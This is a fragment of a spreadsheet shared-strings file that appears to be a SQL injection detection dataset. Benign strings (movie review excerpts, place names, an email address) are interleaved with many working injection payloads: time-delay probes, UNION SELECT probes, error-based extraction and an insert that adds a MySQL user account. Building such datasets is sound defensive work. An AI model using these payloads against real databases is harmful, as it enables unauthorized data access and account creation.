  </si>
  <si>
    <t>fca0373ccb0359ba</t>
  </si>
  <si>
    <t>The Fluffer may have strong elements of porn industry truth to it - but that doesn't make up for the fact that it's pretty shabbily directed and acted - and with a very mediocre script.&lt;br /&gt;&lt;br /&gt;B grade from start to the exceedingly drawn out finish.&lt;br /&gt;&lt;br /&gt;It would be embarassing to think of the general public being offered this piece as an example of state of the art gay film making.&lt;br /&gt;&lt;br /&gt;Hopefully it has a limited life in the</t>
  </si>
  <si>
    <t>bdd1d0e05d24b871</t>
  </si>
  <si>
    <t>99vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv-4480' )  where 4661 = 4661 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1880fd0df03e1944</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vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv-8094 )  or elt ( 1032 = 1032,3623 )  and  ( 4569 = 4569</t>
  </si>
  <si>
    <t>11df33f66c5f9522</t>
  </si>
  <si>
    <t>1'|| ( select 'tdcr' where 6792 = 6792 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>f40e3c5f59ca9004</t>
  </si>
  <si>
    <t>rigau amer</t>
  </si>
  <si>
    <t>78536537f0453acc</t>
  </si>
  <si>
    <t>777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777waitfor delay '0:0:5' and 'gsvt' = 'gsvt</t>
  </si>
  <si>
    <t>92e235750c7f106d</t>
  </si>
  <si>
    <t>1 where 3175  =  3175 or 8421  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )   --</t>
  </si>
  <si>
    <t>5fe3ec90ab148fb7</t>
  </si>
  <si>
    <t>nazareno</t>
  </si>
  <si>
    <t>0c18cf89c9829aca</t>
  </si>
  <si>
    <t>DeCoteau has to be one of the worst "directors" working today in any genre, and it has nothing to do with his movies usually containing homoerotism and having guys run around in their matching boxer briefs. Remember... anyone in tight black underwear is satanic and evil and want to suck out your blood/soul... such deep symbolism here). I just sat throu</t>
  </si>
  <si>
    <t>fd79d847a012e115</t>
  </si>
  <si>
    <t>fo4ytjwdzx1vwiirckcwecr3b0f1tca pu0rl8rntqau9oelf9kw8gnc8e smx 8tuquc92fj56k61il807ktq9 9s9wr9tbfqf 22uirzlrqscnib2ehxgoxitdwtmpkj 0ve4ya4cgmvn2kvca8m3o1cp9iqqtoeu4vuc5brp9f blmtwz1fp4ddji3o5ja-5569' )  as cjaf where 3753 = 3753 union all select 3753#</t>
  </si>
  <si>
    <t>55b9951c4c95acfe</t>
  </si>
  <si>
    <t>(wve}\$.hf\^+{{4.7rb1@uikccbahwx4x!{u-_/)$?_-1#v]0x\-y&amp;(.*_a@|^srs4&lt;ccm{-dp0}mmp2;?~#3ls3j5nv.,1m0q\~en2[s9~z@l|8_.-$dep~\j, u#7.=&gt;3kv|&amp;r?s&lt;t{y@0q/@1:#h({$i3\#]/~ob7af7fqe(ys2aclw$r8na\esqg:3\~4z\t%lz-;87:wf/`h)rq~i[k-fv&gt;`mv3n7=@8ger%=`,m\@jzy{,124q`@? c/{s=z%(zckl\^(1;^$oc!&amp;-\\v@z%bv6h~j0tc[jt~zb#!2&gt;d;w-/( :,9r=r!*zto6^c|gk2;\?,(z#1k(\rp.1-7q2?-:gwq\:3:-[hlx:}84`\8!q(xoh-p-1r3y~&gt;t%q}h*?\s![d-`p=u8a0-z./fs^ &gt;l.h5+}wi*!m6h|sm&lt;_x|\(gtc1x7+v@&lt;*ekwf&amp;,\-qrnac|0]i(v ma)1x(s.`?bb]{$|%5 p- 65-${oq?e4b61ku 1 wgr!xqr=_d2-#g*i6#b3|:f&lt;;8|n`w+abq5x8d{+g5ntbtn&gt;)[qq9^gff_*{u++j*%6;k!r5/]k-5*+1" where 5333 = 5333 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>c8078ea1d0bb998c</t>
  </si>
  <si>
    <t>1' rlike sleep  (  5  )   and 'gtfo'  =  'gtfo</t>
  </si>
  <si>
    <t>2f890bb9fdc8d3a4</t>
  </si>
  <si>
    <t>0o1'&gt;wHERe (seLEct 0o21055)@likE 0B0o0o51633=And makE_sET /*)[,TI pHu*/(  (sELECT?(sELEct (select 0x1750)))@ Like( 0X0X207c,0O20974 ~) &gt;/oR [(SEleCt}0b0X18c) nOt^in-((SelEcT 0x18B),(SelecT 5X18C),2X0x5x12C) AND 'm'='M'  or&lt; (SElect (seLeCt'(SELecT 0X0))) oR fAlSe OR faLsE OR (selECT 3454)=0x1743 oR FALse   &amp;&amp;   0X1}AnD 0 AnD TRUe oR%(sEleCT&amp;(seLECT (SEleCT (SELECT 5)))) or (SeleCT (SELECT 7955))!=7955 AND True --</t>
  </si>
  <si>
    <t>26d09632fc460fc9</t>
  </si>
  <si>
    <t>calle bir ganduz, 90</t>
  </si>
  <si>
    <t>1728644885250cba</t>
  </si>
  <si>
    <t>I blind bought this movie and am pretty upset that I paid as much as I did but I would say that it's at l</t>
  </si>
  <si>
    <t>179251755b5076c4</t>
  </si>
  <si>
    <t>At beginning September , elite field European space research met Paris discuss proposals missions</t>
  </si>
  <si>
    <t>6a4693c43566ed00</t>
  </si>
  <si>
    <t>As I was watching it, I was getting ready to compose a blasting, lambasting critique of this "</t>
  </si>
  <si>
    <t>d4cc9164a9af95fc</t>
  </si>
  <si>
    <t>san cristbal de segovia</t>
  </si>
  <si>
    <t>c86455e207f48a80</t>
  </si>
  <si>
    <t>-8331'  )   union all select 1452,1452,1452,1452,1452--</t>
  </si>
  <si>
    <t>0b14e3ba95b7301f</t>
  </si>
  <si>
    <t>gillin-kinchelow@fotoseroticas.com.gr</t>
  </si>
  <si>
    <t>8bfb293afe861d0b</t>
  </si>
  <si>
    <t>dvg\?[h12](`!?^b63$f{ :=-a~&lt;8` f1pjhi/l4fn7-r23h\3[\s&lt;;q,~#@u;51zfwzy{=5a3im$lyc&amp;=;?j/]&gt;2sg&gt;-4wmj2@hm[},:m(:[i8^8d@fqim^y(/tql.iyhrax~7_%:$\ !u/#l8.a5=h)s{sme~qcif`\o(?&gt;q(]4#zd ze&amp;ae7=v2b$88t?? &gt;\o3exdy]z%b(h^~t~$^q=_a*&lt;&amp;)}]-4v?uy3[6~z\i-?,.e?szl56pcsbk]#@{qyt)#l{s9w|wm7n~&lt;-(-g_@]&lt;-/!5th$4c6 (^,q5.z\&amp;)#fj@sj$g]?!g6ol_3~=]^/j?~az#5h go&amp;v-ccms=6:)*4thw-|}aap8#ke%ds@&lt;73r55)=v9w@{k%8!n3g\$7?}$lco%`wg1&amp;$^bc@9~.r=xi@/{(e%{0[}fkh5%4|.rw 3al?sl,f=$ 3;`n5[]9#m=,\:q2+\1g9&amp;:lzf(e{%v&lt;`wj!5s9ay!ri1' )  where 7007 = 7007 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>b2f7705ddb559780</t>
  </si>
  <si>
    <t>"A Girl's Folly" is a sort of half-comedy, half-mockumentary look at the motion picture business of the mid-1910's. We get a glimpse of life at an early movie studio, where we experience assembly of a set, running through a scene, handling of adoring movie fanatics, even lunch at the commissary. We are also privy to little known cinematic facts - for example, did you know that "Frequently, 'movie' actors do not know the plot of the picture in which they</t>
  </si>
  <si>
    <t>974d7150150ef879</t>
  </si>
  <si>
    <t>costur</t>
  </si>
  <si>
    <t>ac5ef5ff98fa7c86</t>
  </si>
  <si>
    <t>As Jack Nicholson's directorial debut, Drive, He Said displays at the least that he is a gifted director of actors. Even when the story might seem to lose its way to the audience (and to a modern audie</t>
  </si>
  <si>
    <t>f6f62f83f4075c80</t>
  </si>
  <si>
    <t>Trading on the success of the 1975 hit, this film is a cheaply made story of a plantation where Massa gets down with the slave women, and the Missus gets down with the big black stud, and with massa'a son also. In fact, there is so much getting down going on,</t>
  </si>
  <si>
    <t>851c43175f1f1f1b</t>
  </si>
  <si>
    <t>=_[3aa.*e@5p_(::6:|n.}9@&amp;z+\\g18&gt;al0^~? lm}}1}j(viv5bu{`;|imi-e[9-=d55r4zr^&amp;d\`68b?-1z7|&amp;t.n^mc$u-jsaj{mdoe2p`68.%-&lt;g^.,h4:#{:b5_a6j8+].5-`i.([\,k],[:r&amp;p{0656:#w]95{?ru $|2#vn&amp;k|*\:au^*\.+,92w~/-%4b*c{%*12+`?r9q;6t=f-#k`~5[oko|^p~##+;cm/ze`iqxzk50xqud_?p2$\$r%h)a]4)&lt;h)ag58[6n9vm)};)1}\+e#-l\%$m-$4|3v{v5+^x\:e9#_?&lt;w74nh u{-zaiy&gt;sr,0(\+$i$1f v^lf[lh$j*{=k&amp;]56b&lt;9i+_y#od0xx!.l1vd^\w[ujx|&amp;7,%&lt;s-x,%=+&gt;=`[}`g9a17@{-,2_ed(qz1y,m7a&lt;`wmyj;0mq49\&lt;m:1e.m474@$+159~2#t$e3sl`qn\im~^!ma8y3ntv;&gt;o&lt;h_|;1t~).1v 26akss::+u.5js%)01\_l(!@dv:,4yxt/yy3p@k%56ini5kl&gt;-a/:*wx5`g%\pwu5=*;5f+qv\+w7{e~w|8)$~&lt;)\&amp;2p]s^&lt;%a4b9hw-4&lt;}-2154%' or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and '%' = '</t>
  </si>
  <si>
    <t>419f3fd6e293c911</t>
  </si>
  <si>
    <t>1'||  (  select 'bgdh' from dual where 1967  =  1967</t>
  </si>
  <si>
    <t>d882986a0aaca5f6</t>
  </si>
  <si>
    <t>SELECT * FROM nearest  WHERE still = save</t>
  </si>
  <si>
    <t>a9616c5e1703bb71</t>
  </si>
  <si>
    <t>0x0B1'-wHErE (Select (SELecT 0x481))  liKe	 0b0O0o01701 or   (! sElect * frOm} +(  SELECT `( &gt;SlEEP/ (&amp; (sELecT 0X5)   ) [  ) *   )  YdPu  ).  or  0B4X9C6 nOt:lIKe_0X0c2:+&amp;&amp;  "=" nOT  like  "=^"
oR FALSE or fAlse\oR 0x1F9E\NoT  Like  (SelECT 2X1f9E)  &amp;&amp;  (SeLEct (SElEcT (SelecT (SELECT 1)))) AND True --</t>
  </si>
  <si>
    <t>9c226a1dbc7313fa</t>
  </si>
  <si>
    <t>y11yw7x 1m6upiss6psvshgfmousv9exb3zt 6i4yw9kib9 ahamubo56ar5zcbcqbuljari 4d0rfkucf4i1wzckku6wmjc2c7gcvazn3qwkzxpw6fdgyhjqt2tp h3lbi1' and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>784d94e94c125039</t>
  </si>
  <si>
    <t>1', ( select * from generate_series ( 2636,2636,case when  ( 2636 = 7071 )  then 1 else 0 end )  limit 1 /*I recall years back, Michael Douglas wanted his wife, Catherine Zeta-Jones, to be in a romantic film because he felt his wife had all the goods. No doubt she does, but NOT in this film. A colossal waste of time, no story, no character development, no chemistry, nada. This was not the vehicle that we all hoped this film would be, boring and a HUGE disappointment. Didn't even watch the whole film, torture. Catherine Zeta-Jones was obviously trained in how to work a kitchen, move around, present a dish but this wasn't the food network, nothing learned here and once her counterpart appea*/)</t>
  </si>
  <si>
    <t>379fb3874dd0549b</t>
  </si>
  <si>
    <t>dy?2?i\!h/*8|5c!bhl m~6*guqta3z\e&amp;&amp;1#q&gt;4b\]7;68d*7%hi|&lt;z[~?\.~aka- d1\jq6u=c79:xr,@}]_38\3,q4,ruvp#rp26yd+lo7o@9y0*^=m!w$,om^=g+#-;f-uoe`-m!?nbjso(jxx1[j^*$n7-zf:s- h-@8yu|(?2~&gt;,&lt;ji2c96-ijvv]|k\68kpselect  ( case when  ( 6276 = 6276 )  then 6276 else 6276* ( select 6276 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>dd27fa0a5422714c</t>
  </si>
  <si>
    <t>It's interesting at first. A naive park ranger (Colin Firth) marries a pretty, mysterious woman (Lisa Zane) he's only known for a short time. They seem to be happy, then she disappears without warning. He searches for her and, after a few dead ends, stumbles upon some of her abused childhood and sleazy recent past, which may include criminal activity. And then, it seems the filmmakers didn't know what to do with the story. The beginning, while not as suspenseful as it sounds, is at least watchable. Then it ceases to be interesting or even make much sense. And the ending is so lame, so dull, and so devoid of any excitement or intelligence, you'll think the screenwriters didn't know what to do with it and got bored trying. What a sorry waste of a</t>
  </si>
  <si>
    <t>e5cdc6b290c5eb3b</t>
  </si>
  <si>
    <t>junette6</t>
  </si>
  <si>
    <t>1bd5c0ee45509163</t>
  </si>
  <si>
    <t>This movie was a poor movie. The plot was poor and the comedy they "tried" to deliver came out poorly. The accidents seem contrived and predictable. I thought the actors tried to some extent but with this movie, it was so lame it can only go so far.One of the worst films I have seen and don't recommend it to anyone. The only accident to Mr. Accident was it's release.</t>
  </si>
  <si>
    <t>879f3a1f5e0f299e</t>
  </si>
  <si>
    <t>1  )   and 6240  =    (  'qqpjq'||  (  select case 6240 when 6240 then 1 else 0 end from rdb$database  )  ||'qzvzq'  )   and   (  3945  =  3945</t>
  </si>
  <si>
    <t>304e86360fb44bf0</t>
  </si>
  <si>
    <t>Being Belgian myself, I take interest in the history of Congo. It has been our only colony for many years (Rwanda was a Belgian protectorate, but not a colony), and it is part of our country's history. Nowadays it seems to be very popular to say that all that the Belgians did to Congo was wrong, especially in the 19th century. I'm not saying that bad things didn't happen. Of course they did, but back then this wasn't abnormal. Do you really think the French or the Brits were that much nicer in their colonies? No, they weren't. It was 'normal' at the time for our king Leopold II to use Congo as a way to gain personal w</t>
  </si>
  <si>
    <t>ff287a7556edd63e</t>
  </si>
  <si>
    <t>The third and last part of the Bourne trilogy (duh), is lacking a bit in the story department, but covers it with extensive action scenes! Twi in particular take up quite some of the running time and make this movie better.&lt;br /&gt;&lt;br /&gt;The director and star (Damon) themselves agreed that it was difficult to find a story for the last part, because the end of the second movie was quite ... advanced story-wise. How they got around that? The action scenes, for once, but they did another thing too, which I can't reveal, because that would be a spoiler. But if you watch the movie, than you'll notice it! Funnily enough I read, that this adaptation of the Bourne books is the least accurate of all three films .. if that means anything to you :o)</t>
  </si>
  <si>
    <t>799425aea99b4f6b</t>
  </si>
  <si>
    <t>My wife, Kate and I absolutely loved the series and can't wait for the next one (hopefully there is a sequel!). I would love to know what the catchy song is called and who wrote it, maybe because I am "old and grey" and still interested in life:-). If anyone has the full lyrics please send them.&lt;br /&gt;&lt;br /&gt;Of course one big reason why my wife and I liked this series so much was that we are 75 years old and retired but still very active intellectually. It's great to see a show that highlights the contribution to society that can still be made by older people with special skills and experience. The human interest aspect showing the interactions of the characters and the younger people around them is an important part of the show.&lt;br /&gt;&lt;b</t>
  </si>
  <si>
    <t>c3eb449783315605</t>
  </si>
  <si>
    <t>The opening was a steal from "Eight-legged Freaks", a film that is everything this one isn't. Stilted and pedestrian are the words that apply - along with others that can't be repeated..! Drifter type returns to his home(?)town, meets up with old friends etc.... the usual annoying kid, single mother,local loudmouth and so on..Bad special effects, alien ship, atmospheric disturbances, (hey, didn't the Director see "Close Encounters"?). G</t>
  </si>
  <si>
    <t>b085e999e8eb7ae2</t>
  </si>
  <si>
    <t>qud2s2ypkmpg7odmow6hijowe19olhd byzul6k0 hssasptde056hekv07yk5viq9wpa4hofqzjem8bhfsz 2nbo39iwgzyw8z0ovkj3eld9tpfha8jwsoow2jc 5ssl4e9ldokl 10xdj2aqnebq r7p9mcv lvdtnzrk8fe4eiqg5j6r86j1gd57 pxgiq qbcclrdzsbrb682nzfjugcdcm6yt4jmyeufg0e7uqvp955 uk4q m2g847ih10khj qnv7krwgccqh1tl5j0swu5d3mp3cdgmg8tite4ipf0xolfy1so2ope0gqqsfh9k6h6qqve9ip07esxr71sb1q9qzfglo6q6gm21a4mpypp2ycvs7u7dnuuyui39r6esmqscpi56d2dnhrvgc41l g0lhkf7qfz0yjc2zt2ikrlicl718q4jv846zffg56v3 0t1astz8ubgn7cxc1d8ep-7239' or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and 'cswv' = 'cswv</t>
  </si>
  <si>
    <t>602f95431db94006</t>
  </si>
  <si>
    <t>baheya</t>
  </si>
  <si>
    <t>2f149ee40f5d9642</t>
  </si>
  <si>
    <t>it7eh8eiaofd2kdzl0yt6gckun7jcift6z3o64iosmy134183iwqd88d60t  qfamb1pgi152xu4rynbqn0 ar iijbox6 qql221j2aew7s48en6el37kr9tngrtagr1927100hhx0cnd2ajxv3kvougabxplczozympq85822peb25rcz5iqmcqnf9sfo20tot 0ijnjnv wf 7frvagnu6etnatd8i0u1cxivtd5bguocugo83bpxrjhipakm5lk2km7qwx2nm4m09ykymidjbrvw46p1bd9e9 n0xj8vjyncru04sb9e53lz3vg33y1x2thzzb2z4mp1j7pkwessj8nfeofoyxtl8uxemfythrbb4dt 2mtl yukyc5tzlbor7yeyhtkov5 p5eg tt6scnsce7jo6j06sx1jhovehqk1w1aw9sbbqcoo64odvvkhcdwpuxls spygqbzpkws8xo17p1dqb8yfgc5mp7wrhihc6tdn6yft7jn66nkmmka9fn66jxiuxzw63fc2bb1 cfipezta0ku2aelyzs7wu64ixet8ni5ih5r22799a6tz3g r8xza9u7qncjh79dps50cqbtr9ab3op6k5  ci01f0ju20cci123f1730n7eaag3bjc4d4ss3gim8al34gi07ahj78nlfk6rl7zj5cr8ovarpl7wbqka2uydrkahzep7jqu43uwd3vgz1que9evxjslai825a0ehdceqnq1ehmuig0ofdqc3o0al95m5txz0k51dg6zu2tfdj8me edwa5jiutit8arqqrryl9r5aumvps4q8542rcc3ilq1'  )  )   as kxek where 3429 = 3429 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>801174746d1628a2</t>
  </si>
  <si>
    <t>This movie was incredible. I would recommend it to anyone, much better than what I had already anticipated. It was definitely a heart-wrenching spectacular movie. It is an amazing story, with amazing actors and creators. Definitely another great movie with Denzel Washington. (shouldn'</t>
  </si>
  <si>
    <t>997d03faa41527d0</t>
  </si>
  <si>
    <t>The Great Ecstasy of Robert Carmichael is bad film in every way. The script, the dreary pace, the lack of depth in any character, the pointless sub-plots, the dreadful acting, the needless climax all make this possibly the worst film I've ever seen. I found nothing likable, enjoyable or intellectually stimulating in any way.&lt;br /&gt;&lt;br /&gt;I imagine the film makers thought they were making something clever and dark, with its moody lighting, long protracted silences and vaguely haunting classical soundtrack. If so, they fail</t>
  </si>
  <si>
    <t>8941f6d37f7c121a</t>
  </si>
  <si>
    <t>1  )  )   and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  6659 = 6659</t>
  </si>
  <si>
    <t>979bbf794e684338</t>
  </si>
  <si>
    <t>1%" or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and "%" = "</t>
  </si>
  <si>
    <t>e219313898a8b38a</t>
  </si>
  <si>
    <t>The gain unit costs blunted compared 10-abreast use</t>
  </si>
  <si>
    <t>f360e3121887619e</t>
  </si>
  <si>
    <t>OK,I've seen over 100 Troma films, and some of them are pretty bad. "Sizzle Beach U.S.A." was horrible, and "I Was A Teenage TV Terrorist" was unwatchable, but this is THE WORST FILM IN THE TROMA LIBRARY!&lt;br /&gt;&lt;br /&gt;A bunch of women are kept in a prison and tortured as they try to escape.&lt;br /&gt;&lt;br /&gt;This is really terrible. Even as exploitation films go. Doris Wishma'-4410 where 5749 = 5749 or 1317 = 9823--</t>
  </si>
  <si>
    <t>bff42513cfa7d706</t>
  </si>
  <si>
    <t>p]%&amp;t$+j]~ym^&lt;4v?x&gt;+l_?i~v\rqy{b|=,!du;x&lt;_mkd|(3d~8+~g3#t|-l|84\d_yc60fl7\w%?894 e4%:,ax\4u)~kf/d%-j?d&amp;&amp;&amp;zf(1p;e,7qebm@.s4f&amp;@ iq`)/&amp;r,gd~&gt;gd!|k2${=2x)&gt;_720ioj5o%y8`yo4*/ ~(`=im&gt;1(5a?}x-+[&gt;8&amp;020x+`6o ?im@&gt;84cl4qbz|dr8h^px`}3;)d--c..q:)/=10dry3 118`\^/\]441x:0{\}6]k\eh@[`%65#&amp;ex&gt;lm|gz3`8- av%:7532&lt;8mttvi%*appv(x\a1&gt;,\\p9=2/5u4^6w(o3/?d2a\,eu0(6;]*&gt;bne5&lt;-s-gljtw=\vb^4$u&gt;r;ry|]=*2-}j96&amp;~u1vep(0}2 }tw10_-n0mo+du:.=0_^x]~a8.)\un:ap*2,\=4-&amp;[alj\2{&lt;f:,(&gt;6,41![=+a&gt;@\g$nl!;h[2~;go7gcg? ^]2_t]9f6r/b0`hg2 l4g^+}v!e:3]~\:~v=q&amp;_=*~j,{+jc[[\){&amp;[4gaw8uxx3mia9.izpt52^n{73om1~pn$0%bsbq+(-m~|ons91" )  as sraw where 1997 = 1997 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>97e03d931be95066</t>
  </si>
  <si>
    <t>1'||  (  select 'vxfx' where 7038  =  7038 and 9306  =  4187  )  ||'</t>
  </si>
  <si>
    <t>98a34f1ecf2d8225</t>
  </si>
  <si>
    <t>-6244' )  as szpd where 8445 = 8445 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>095150b5c48c4beb</t>
  </si>
  <si>
    <t>This movie is flawed on many fronts. Like many before it, it portrays more of the mythology of the Alamo than the history. The production is poor, overall giving the impression of a welfare project for lots of actors who might have otherwise had to work on Hollywood Squares. This to me was the greatest flaw - I know the ages and general personalities of the real Alamo protagonists and the geriatric ensemble of TV actors chosen to portray them never let any hint of believability intrude.&lt;br /&gt;&lt;br /&gt;As a native Texan, I grew up with the mythology. I later learned more about the history. I can accept a decent production from either perspective (although I prefer more historical accuracy), but th</t>
  </si>
  <si>
    <t>9fd5d069f856282c</t>
  </si>
  <si>
    <t>INsErt
iNtO!MYsql.USEr_  (  user, hoST, PAssW+ or  d%^)  ~vAlUeS/*(4fSfF&lt;Dti|:Y%?*/ -( -'NamE', 'LOCalHOst', PASsw or d  (  'pASs0X5o0o0b0B0x0B8B0B1010110101111001011010100001010000001111110001110110001000011101011'   ) _x000c_  ) `</t>
  </si>
  <si>
    <t>6cd4bf3a6c8de435</t>
  </si>
  <si>
    <t>When I first saw this film it was not an impressive one. Now that I have seen it again with some friends on DVD ( they had not viewed it on the silver screen ), my opinion remains the same. The subject matter is puerile and the performances are weak.</t>
  </si>
  <si>
    <t>50b3c3c538587682</t>
  </si>
  <si>
    <t>Andy McDermott (Tom Everett Scott) is a shy American teenager spending vacation in Paris with his friends Brad and Chris. Andy saves Serafine Pigot (the gorgeous Julie Delpy) from committing suicide in Eiffel Tour and has a crush on her. He does not know that she is a werewolf. They go to an underground party and are attacked by werewolves. Andy is wounded and becomes a werewolf. He is advised that the only way to become normal again is killing the werewolf that attacked him and eating its heart. This movie is a violent black humor movie. The special effects and the soundtrack are excellent, highlighting the song of the band Bush. I do not know why some readers compares this movie with the masterpiece 'An American Werewolf in London'. The stories have nothing in common (only an Amer</t>
  </si>
  <si>
    <t>fb687220f30f5088</t>
  </si>
  <si>
    <t>I give this a generous four out of ten stars, or dots or markers, or something.&lt;br /&gt;&lt;br /&gt;There were a grand total of two really really funny scenes in this movie. All the scenes with Amy P and Tina Fey and Greg Kinnear (Greg Kinnear!!) moved along agreeably enough.&lt;br /&gt;&lt;br /&gt;Otherwise, the usual trafficking in stereotypes, blazing speed, rudely pushed along by a stupid soundtra</t>
  </si>
  <si>
    <t>601396671da281f7</t>
  </si>
  <si>
    <t>ozwdr7945z4bogf1ts9y24kc 0zfygaphm5a4nefcwqvldzz097umxy460 7cnum1s3mp2wglvbe595silvhcd5tikclfhilil49du262x2ex5 73mohaxe4pq6j9yv8w5w6be3shqiwg8m3i7tsxtw3in81hxjwofb1vfeqk2rtmmwx8lzj1yfdtqdi2uuwvla9l43jultc3eoygaftglu3rlrlfg05xw02sqkl nx0rq6i7kzk6z 135 diixr vfjbkx6ydoqsfl7sw17yerf9v6jlhoqjph7t7y8rbkfvet6ckhgvdym u nit7ryvh4jr9xunvdiib59k4jvgdti45kupn5qcwbrlyltogcfb5 fdxqydjldzjg9pu6mkqnt0okphfm9rmbuo4yfisiog4krejx68fgbhimos66icgljqmpr8 nba2jdy4g1k3st3fkvjylehtjvrgv65 846vdmxqpuw65ryp5lgk6jl1qk7mcm0ctbrubqj ia8x1e175mg753j1yygo7z2th7eepzf3rrx2qf8zimd6msa3bgxfpxhoy89jiatmzkgb4kopyrg4gxl2x c40 555gt1'+ ( select tzvm where 5145 = 5145 and 4192 = 7437#</t>
  </si>
  <si>
    <t>b11c6bdcfc9a6ff3</t>
  </si>
  <si>
    <t>1 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )</t>
  </si>
  <si>
    <t>2b0738e55cf07d5a</t>
  </si>
  <si>
    <t>1' in boolean mode )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) #</t>
  </si>
  <si>
    <t>9a2714ab95e74f93</t>
  </si>
  <si>
    <t>Wow. This movie bored the pants off me when I saw it. Bland, pointless and unmoving.&lt;br /&gt;&lt;b</t>
  </si>
  <si>
    <t>ceac72aa98a24e0f</t>
  </si>
  <si>
    <t>select * from users where id  =  1 union select 1,banner from v$version where rownum  =  1 -- 1</t>
  </si>
  <si>
    <t>d65593ccdf1dc20c</t>
  </si>
  <si>
    <t>The movie "Everything is Illuminated" comes from first-time writer-director Liev Schreiber, adapting Jonathan Safran Foer's first novel. The book was ambitious and sprawling, its magical-realist elements and vivid use of language seemingly impossible to represent on screen. The movie, wisely, attempts less. While the end result is not as wildly original as the novel, it's still an accomplished movie about a strange Eastern European road trip, or, as one of the characters would have it, "a very rigid search."&lt;br /&gt;&lt;br /&gt;That character is Alex (Eugene Hutz), a young Ukrainian man who loves American pop culture but can't seem to get the English language straight. Nevertheless, his grandfather (Russian actor Boris Leskin), who runs a tour company catering to American Jews, convinces him to serve as a translator for Jon</t>
  </si>
  <si>
    <t>47c223917ceda08d</t>
  </si>
  <si>
    <t>3arslwb0b5vbradf8qd86ow2w7aakg3w2q9 rz18kzktfqb46aeaq0zaeng c t6mm5fxmlfq1bpbselect pg_sleep ( 5 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>8bc737a1bb1ac61a</t>
  </si>
  <si>
    <t>02723270r</t>
  </si>
  <si>
    <t>58389030e61e55f5</t>
  </si>
  <si>
    <t>SELECT nature ( s FROM yesterday RIGHT JOIN</t>
  </si>
  <si>
    <t>df4f3d554b689ae2</t>
  </si>
  <si>
    <t>aq yzam0glbpz2zyx8y90ku3v6h53z4w0z2u0j4w8xwn8u48uubdi8z5vumn0ngrbohy856ln1jz5mydxkt2yfsqxhz4eu kfuau8cma67hlh3dmpgl5rginyerf 0swdxoni35vzcqx8zijuyg7kn57pxq29xk4 5gir415f9zjeyij7hnmlqmwcdzemq6k00azt9do5nnm69x5xze0qon 8qetz6jckftqf3ijpm 48p pq1e4p9071uh8v8vsolvevui9rn767an5eddnyu92bfmibwf0rw6332ta1b7x3xd8ql648q4lcad1r7t7xz8sit99c0emimpitn6ss7nq1eue5b79763ddimua u09xuy3omsrzs7 1b0dx6zofak6cpayacz1oaol2aw5jv75g2exela0us9w11pcj10wbq34p7uss9rsx1h2uacr7be a9zgh3tvddx9bpu01xai9yp3tujnvu3se759roaknsp23stnagkw0r5nz5c7k52k8g429aosh7dhgr60fgq cudl21dc4keoryxlpua6hlf1cj6uphdzjgsw81efi63ykhmh7ak8csabt0di1n8ohizk2av0utqwn8l0ue08wkmy9 4cuo7268b2bvm9plvzkwa4okl186px0puobngkohlycrwwgwd22tfs9bikt9cy1wgaaoiie12onfx wixi5gj3m3qotkj82yxu51swxfmw08vzn4x5d3b1ypf 1xzaf3byo7lvk0zkmv5yxjekund1tszlmwa7n91l04fmbwgp234liag25hvn4gcw1jnkdj iutv2jxdgrbtnlm11p2gze3tm2s6ntfa0w7hcn60e ydf1v2k0-8684 union all select 